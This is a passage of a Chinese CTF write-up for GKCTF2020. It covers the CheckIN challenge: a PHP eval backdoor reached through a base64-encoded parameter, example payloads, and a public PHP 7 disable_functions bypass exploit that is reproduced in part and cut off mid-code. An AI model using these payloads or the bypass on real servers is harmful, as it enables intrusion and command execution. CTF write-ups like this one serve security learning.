本文主要是介绍GKCTF2020 web+misc,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
文章目录
- web
- CheckIN
- cve版签到
- 老八小超市儿
- EZ三剑客-EzNode
- EZ三剑客-EzWeb
- EZ三剑客-EzTypecho
- Node-Exe(unsolved)
- misc
- Pokémon
- code obfuscation(unsolved)
- Harley Quinn
web
CheckIN
考点:代码审计,绕disable_functions
题目给了源码:
<title>Check_In</title>
<?php
highlight_file(__FILE__);
class ClassName
{public $code = null;public $decode = null;function __construct(){z$this->code = @$this->x()['Ginkgo'];$this->decode = @base64_decode( $this->code );@Eval($this->decode);}public function x(){return $_REQUEST;}
}
new ClassName();
在__construct()中,传入Ginkgo参数,会被base64_decode,所以先base64编码一下RCE:
phpinfo();->cGhwaW5mbygpOw==
得到phpinfo()回显。
在disable_function看出禁用了很多函数。
先遍历一下目录:
payload:
?Ginkgo=dmFyX2R1bXAoc2NhbmRpcignLi4vLi4vLi4vLi4vJykpOw==
dmFyX2R1bXAoc2NhbmRpcignLi4vLi4vLi4vLi4vJykpOw==是var_dump(scandir('../../../../'));的base64编码,得到:
可以看到有一个readflag文件。连上蚁剑(话说我为什么扫目录):
编码器选择base64可能不行,之前就卡这了,官方wp给出了一个自己写的编码器:
编码器选择自己的,连接成功:
果真执行不了。那就是绕disable_function了,有现成exp:
链接:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
利用:
<?php# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)## Bug: https://bugs.php.net/bug.php?id=72530## This exploit should work on all PHP 7.0-7.3 versions## Author: https://github.com/mm0r1
pwn("echo `/readflag` > /tmp/flag.txt");//执行/readflag,把值写到flag.txt
function pwn($cmd) {global $abc, $helper;function str2ptr(&$str, $p = 0, $s = 8) {$address = 0;for($j = $s-1; $j >= 0; $j--) {$address <<= 8;$address |= ord($str[$p+$j]);}return $address;}function ptr2str($ptr, $m = 8) {$out = "";for ($i=0; $i < $m; $i++) {$out .= chr($ptr & 0xff);$ptr >>= 8;}return $out;}function write(&$str, $p, $v, $n = 8) {$i = 0;for($i = 0; $i < $n; $i++) {$str[$p + $i] = chr($v & 0xff);$v >>= 8;}}function leak($addr, $p = 0, $s = 8) {global $abc, $helper;write($abc, 0x68, $addr + $p - 0x10);$leak = strlen($helper->a);if($s != 8) { $leak %= 2 << ($s * 8) - 1; }return $leak;}function parse_elf($base) {$e_type = leak($base, 0x10, 2);$e_phoff = leak($base, 0x20);$e_phentsize = leak($base, 0x36, 2);$e_phnum = leak($base, 0x38, 2);for($i = 0; $i < $e_phnum; $i++) {$header = $base + $e_phoff + $i * $e_phentsize;$p_type = leak($header, 0, 4);$p_flags = leak($header, 4, 4);$p_vaddr = leak($header, 0x10);$p_memsz = leak($header, 0x28);if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write# handle pie$data_addr = $e_type == 2 ? $p_vaddr :<这篇关于GKCTF2020 web+misc的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin](https://i-blog.csdnimg.cn/direct/ed45c0efd0ac40c68b2c1bc7b6d90ebc.png)